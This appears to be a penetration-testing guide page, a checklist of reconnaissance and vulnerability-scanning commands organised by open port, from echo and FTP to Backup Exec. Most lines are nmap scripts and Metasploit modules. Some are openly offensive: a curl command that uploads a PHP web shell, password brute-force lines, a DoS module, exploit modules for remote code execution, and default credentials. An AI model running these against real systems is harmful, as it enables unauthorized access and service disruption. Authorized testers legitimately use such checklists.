VAPT - 2023
  • VAPT - Kickstart
  • Information Gathering
    • My Recon
    • Enumeration - Open Ports
Powered by GitBook
On this page

Was this helpful?

  1. Information Gathering

Enumeration - Open Ports

Checklist - Open Ports Recon & Enumeration

Checklist for Enumeration & Vulnerability Scanning for Common Open Ports:

Port: 7 ECHO nc -uvn (ip) 7

Port: 13 DAYTIME

nmap -sV --script=daytime (leads to DDoS)

Port: 21 FTP

nmap -p 21 -sV (ip) nmap -p 21 --script=ftp-* -d nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,,ftp-vuln-cve2010-4221,tftp-enum -p 21 -n -v -sV -Pn (ip) auxiliary/scanner/ftp/anonymous auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ftp/ftp_version auxiliary/scanner/ftp/konica_ftp_traversal (ip)

Port: 22 SSH

Manual:

ssh ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root (ip) nmap -p 22 -n -v -sV -Pn --script ssh-hostkey (ip) nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt (ip) auxiliary/scanner/ssh/fortinet_backdoor auxiliary/scanner/ssh/juniper_backdoor auxiliary/scanner/ssh/ssh_enumusers auxiliary/scanner/ssh/ssh_identify_pubkeys auxiliary/scanner/ssh/ssh_login auxiliary/scanner/ssh/ssh_login_pubkey auxiliary/scanner/ssh/ssh_version

Port: 23 TELNET

nmap -p 23 -sV (ip) nmap -p 23 --script=telnet-* (ip)

Port: 25 SMTP

nmap --script=smtp-enum-users,smtp-commands,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764,smtp-vuln-cve2010-4344 -p 25 -n -v -sV -Pn (ip) auxiliary/scanner/smtp/smtp_enum auxiliary/scanner/smtp/smtp_ntlm_domain auxiliary/scanner/smtp/smtp_relay auxiliary/scanner/smtp/smtp_version

Port: 43 Whois whois -h (host) -p (port) "example.com"

Port: 53 Domain nmap -Pn -p 53 --script=dns-nsid (ip)

Port: 69 TFTP nmap -Pn -sU -p69 -sV --script tftp-enum (ip) use auxiliary/admin/tftp/tftp_transfer_util

Port: 79 FINGER nc -vn (ip) 79 echo "root" | nc -vn (ip) 79 use auxiliary/scanner/finger/finger_users

Port: 80 HTTP

nikto -h http://(ip)/ curl -v -X PUT -d '<?php shell_exec($_GET["cmd"]); ?>' http://192.168.1.10/shell.php (For PHP Sites) sqlmap -u http://(ip)/ --crawl=5 --dbms=mysql nmap -p 80 -n -v -sV -Pn --script http-backup-finder,http-config-backup,http-errors,http-headers,http-iis-webdav-vuln,http-internal-ip-disclosure,http-methods,http-php-version,http-qnap-nas-info,http-robots.txt,http-shellshock,http-slowloris-check,http-waf-detect,http-vuln* (ip)

Port: 81 HTTP VisualSVN Server: nmap -p 80,81,443 --script http-svn-info (ip) Port: 88 Kerberos Check for MS14-068

Port: 110 POP3

nmap -p 110,995 --script pop3-ntlm-info (ip) use auxiliary/scanner/pop3/pop3_version

Port: 111 RPCBIND

rpcinfo (ip) nmap -sSUC -p111 <ip> use auxiliary/scanner/nfs/nfsmount use auxiliary/dos/rpc/rpcbomb (If NFS Service is found exploit with it)

Port: 113 Ident nc -vn (ip) 113

Port: 123 ntp nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123

Port: 135 Microsoft RPC

nmap -sV --scripts=nfs-* (ip) nmap -n -v -sV -Pn -p 135 --script=msrpc-enum (ip) rpcbind -p (ip) rpcinfo -p (ip) rpcclient --I (ip) showmount -e (ip) mount -t nfs 192.168.0.100:/home/machine /tmp/mnt -nolock use exploit/windows/dcerpc/ms05_017_msmq

Port: 139/445 SMB Service

nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smbv2-enabled,smb-vuln* (ip) enum4linux -a 192.168.1.10 rpcclient -U "" 192.168.1.10 (post commands : >srvinfo, >enumdomusers, >getdompwinfo) smbclient -L 192.168.1.10 smbclient \192.168.1.10\ipc$ -U administrator smbclient //192.168.1.10/ipc$ -U administrator smbclient //192.168.1.10/admin$ -U administrator auxiliary/scanner/smb/psexec_loggedin_users auxiliary/scanner/smb/smb_enumshares auxiliary/scanner/smb/smb_enumusers auxiliary/scanner/smb/smb_enumusers_domain auxiliary/scanner/smb/smb_login auxiliary/scanner/smb/smb_lookupsid auxiliary/scanner/smb/smb_ms17_010 auxiliary/scanner/smb/smb_version

Port: 161/162 UDP SNMP Service

nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat (ip) snmp-check -t 192.168.1.10 -c public snmpwalk -c public -v 1 192.168.1.10 1.3.6.1.4.1.77.1.2.25 [MIB_TREE_VALUE] (common string value) hydra -P passwords.txt -v (ip) snmp ( community and snmp tree reference below) public private community SNMP MIB Trees 1.3.6.1.2.1.25.1.6.0 System Processes 1.3.6.1.2.1.25.4.2.1.2 Running Programs 1.3.6.1.2.1.25.4.2.1.4 Processes Path 1.3.6.1.2.1.25.2.3.1.4 Storage Units 1.3.6.1.2.1.25.6.3.1.2 Software Name 1.3.6.1.4.1.77.1.2.25 User Accounts 1.3.6.1.2.1.6.13.1.3 TCP Local Ports auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/snmp/snmp_enum_hp_laserjet auxiliary/scanner/snmp/snmp_enumshares auxiliary/scanner/snmp/snmp_enumusers auxiliary/scanner/snmp/snmp_login

Port: 194, 6660-7000 IRC nc -vn ( ip) 194 openssl s_client -connect (ip):(port) -quiet nmap -sV --script=irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 (ip)

Port: 264 Checkpoint FW use auxiliary/gather/checkpoint_hostname

Port: 389/636 Ldap ldapsearch -h (ip) -p 389 -x -b "dc=mywebsite,dc=com" nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest, ldap.qfilter=users,ldap.attrib=sAMAccountName' (ip) nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest, ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows Server",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' (ip) nmap -sV --script "ldap* and not brute" (ip) Using anonymous credentials

Port: 443 HTTPS

sslscan https://(ip)/ nmap -sV --script=ssl-heartbleed (ip)

Port: 500 IPSEC IKE/VPN ike-scan -M (ip) ike-scan -M --showbackoff (ip)

Port: 502 ModBus nmap --script modbus-discover -p 502 (ip)

Port: 512 Rexec nmap -p 512 --script rexec-brute (ip)

Port: 513 Rlogin nmap -p 513 --script rlogin-brute (ip) rlogin -l root (ip)

Port: 514 Rsh rsh (ip) <command>

Port: 548 AFP use auxiliary/scanner/afp/afp_server_info nmap -sV --script "afp-* and not dos and not brute" -p 548 (ip)

Port: 554 RTSP Check for IP-Cameras nmap -sV --scripts "rtsp-*" -p 554 (ip)

Port: 587 Submission Outgoing SMTP port. if Postfix is running check CVE-2014-6271

Port: 623 IPMI nmap -n-sU -p 623 (ip) use auxiliary/scanner/ipmi/ipmi_version use auxiliary/scanner/ipmi/ipmi_cipher_zero use auxiliary/scanner/ipmi/ipmi_dumphashes SuperMicro IPMI UPnP use exploit/multi/upnp/libupnp_ssdp_overflow

Port: 631 CUPS Check http://ip:631/admin & http://ip:631/printers

Port: 873 Rsync nc -vn (ip) 873 nmap -sV --script "rsync-list-modules" -p 873 (ip) use auxiliary/scanner/rsync/modules_list

Port: 902 (VMware Authentication Daemon Version) use auxiliary/scanner/vmware/vmauthd_login use auxiliary/scanner/vmware/vmauthd_version nmap -p 902 --script vmauthd-brute

Port: 1026 Rusersd rusers -l (ip)

Port: 1098/1099 Java RMI nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098,1099 (ip) use auxiliary/scanner/misc/java_rmi_server use auxiliary/gather/java_rmi_registry

Port: 1433 MSSQL Service

nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt (ip) nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password (ip) sqsh -S 192.168.1.10 -U sa auxiliary/scanner/mssql/mssql_login auxiliary/admin/mssql/mssql_exec auxiliary/admin/mssql/mssql_enum

Port: 1521 ORACLE DB Service

nmap -n -v -sV -Pn -p 1521 --script=oracle-enum-users --script-args sid=ORCL,userdb=users.txt (ip) nmap -n -v -sV -Pn -p 1521 --script=oracle-sid-brute (ip) tnscmd10g version -h 192.168.1.10 tnscmd10g status -h 192.168.1.10 auxiliary/scanner/oracle/emc_sid auxiliary/scanner/oracle/oracle_login auxiliary/scanner/oracle/sid_brute auxiliary/scanner/oracle/sid_enum auxiliary/scanner/oracle/tnslsnr_version auxiliary/scanner/oracle/tnspoison_checker

Port: 1720 H.323 Network (Voip)

use auxiliary/scanner/h323/h323_version

Port: 2000 Cisco-sccp telnet (ip) 2000

Port: 2049 NFS showmount -e 192.168.1.100 mount 192.168.1.100:/ /tmp/NFS mount -t 192.168.1.100:/ /tmp/NFS

Port: 2100 Oracle XML DB Access through ftp - Default logins: sys:sys scott:tiger

Port: 2181 ZOOKEEPER

nc (ip) 2181

Port: 3097 Chunghwa Telecom Data nc (ip) 3097 After netcat, Post-exploit misc script /etc/passwd

Port: 3306 MYSQL Service

nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122 (ip) mysql --host=192.168.1.10 -u root -p auxiliary/scanner/mysql/mysql_authbypass_hashdump auxiliary/scanner/mysql/mysql_login auxiliary/scanner/mysql/mysql_schemadump auxiliary/scanner/mysql/mysql_version auxiliary/scanner/mysql/mysql_writable_dirs

Port: 3389 RDP

ncrack -vv --user administrator -P passwords.txt rdesktop -u guest -p guest (ip) -g 94% rdp://192.168.1.10,CL=1 rdesktop 192.168.1.10

auxiliary/scanner/rdp/ms12_020_check auxiliary/scanner/rdp/rdp_scanner

Port: 4369 EPMD nmap -sV -Pn -n -T4 -p 4369 --script epmd-info (ip) use exploit/multi/misc/erlang_cookie_rce

Port: 4445 Upnotifyp Check with netcat and browser

Port: 4555 RSIP Check for CVE-2015-7611

Port: 5060 and 5061 (SIP Enabled Devices - VOIP)

use auxiliary/scanner/sip/enumerator nmap --script=sip-enum-users -sU -p 5060

Port: 5353 mDNS nmap -Pn -sUC -p5353 (ip)

Port: 5432/5433 PostgreSQL use auxiliary/scanner/postgres/postgres_version use auxiliary/scanner/postgres/postgres_dbname_flag_injection use auxiliary/scanner/postgres/postgres_hashdump use auxiliary/scanner/postgres/postgres_schemadump use auxiliary/admin/postgres/postgres_readfile use exploit/linux/postgres/postgres_payload use exploit/windows/postgres/postgres_payload

Port: 5671/5672 AMQP nmap -sV -Pn -n -T4 -p 5672 --script amqp-info (ip)

Port: 5800/5801 VNC nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p (port) (ip) use auxiliary/scanner/vnc/vnc_none_auth

Port: 5900 VNC vncviewer (ip) use auxiliary/scanner/vnc/vnc_login use auxiliary/scanner/vnc/vnc_none_auth

Port: 7001 x11 nmap -Pn -A -p 7001 --script=x11-access <ip> (unauthenticated access)

Port: 7552 Microsoft Terminal Service nmap --script rdp-ntlm-info (ip) nmap -sV --script=rdp-vuln-ms12-020 (ip) nmap --script rdp-enum-encryption (ip)

Port: 8009 Apache JServ Protocol (AJP) nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -p 8009 (ip)

Port:8014,8443,8445,9090 (Symantec Endpoint Protection Manager) default credentials use exploit/windows/http/sepm_auth_bypass_rce https://www.exploit-db.com/exploits/31853

Port: 8400 Commvault cvd

use exploit/windows/misc/commvault_cmd_exec

Port: 10000 Ndmp Symantec/Veritas Backup Exec ndmp (NDMPv3): use exploit/windows/backupexec/ssl_uaf

PreviousMy Recon

Last updated 4 years ago

Was this helpful?